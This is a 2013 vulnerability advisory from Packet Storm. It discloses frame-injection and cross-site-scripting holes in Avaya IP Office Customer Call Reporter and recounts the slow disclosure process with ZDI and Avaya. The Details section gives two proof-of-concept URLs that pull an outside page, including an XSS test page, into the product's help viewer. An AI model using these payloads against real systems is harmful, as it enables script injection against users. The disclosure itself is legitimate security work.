Avaya IP Office Customer Call Reporter 8.0.9.13 XSS

2013-08-22T00:00:00
ID PACKETSTORM:122910
Type packetstorm
Reporter MustLive
Modified 2013-08-22T00:00:00

Description

                                        
                                            `Hello list!  
  
I want to warn you about vulnerabilities in Avaya IP Office Customer Call  
Reporter. These are Remote HTML Include and Remote XSS Include (Cross-Site  
Scripting) vulnerabilities.  
  
After I found multiple vulnerabilities in Avaya IP Office Customer Call  
Reporter in December, I informed ZDI about them (critical ones). ZDI was  
very slow in processing these holes (regardless of my remindings) and only  
at 30th of July they begun actively working with them. I wrote about this  
case with ZDI in WASC Mailing List  
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-July/008883.html).  
  
When Avaya ignored my informing in July and ZDI stopped working on this case  
in August (since Avaya was not responding to them also), I published these  
two vulnerabilities (the least critical). There are many other  
vulnerabilities, including critical holes which allow to take control over  
admin panel, so Avaya still has a chance to get details of vulnerabilities  
in their product before public disclosure.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are Avaya IP Office Customer Call Reporter 8.0.9.13 (tested in  
December 2012) and 9.0.0.0 (tested recently) and previous versions.  
  
-------------------------  
Affected vendors:  
-------------------------  
  
Avaya Inc.  
http://www.avaya.com  
  
----------  
Details:  
----------  
  
Remote HTML Include (Frame Injection) (WASC-12):  
  
http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua  
  
Remote XSS Include (Cross-Site Scripting) (WASC-08):  
  
http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua/webtools/xss_r2.html  
  
------------  
Timeline:  
------------   
  
2012.12.06 - found multiple vulnerabilities (these ones and other critical  
holes).  
2012.12.13 - informed ZDI about other critical vulnerabilities.  
2012.12.18 - again informed ZDI about other critical vulnerabilities.  
2013.01.27 - registered at zerodayinitiative.com and informed them through  
the site. ZDI started working on the case.  
2013.07.28 - informed Avaya (via two contact forms) about these holes and  
other critical vulnerabilities, due to slowness of ZDI.  
2013.07.29 - wrote about ZDI in WASC Mailing List.  
2013.07.30 - if earlier ZDI only pretended they work on the case, then this  
time they started working actively on it (and tried to contact Avaya).  
2013.08.07 - ZDI stopped working on the case and closed it, since Avaya was  
not responding.  
2013.08.20 - disclosed at my site (http://websecurity.com.ua/6717/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
`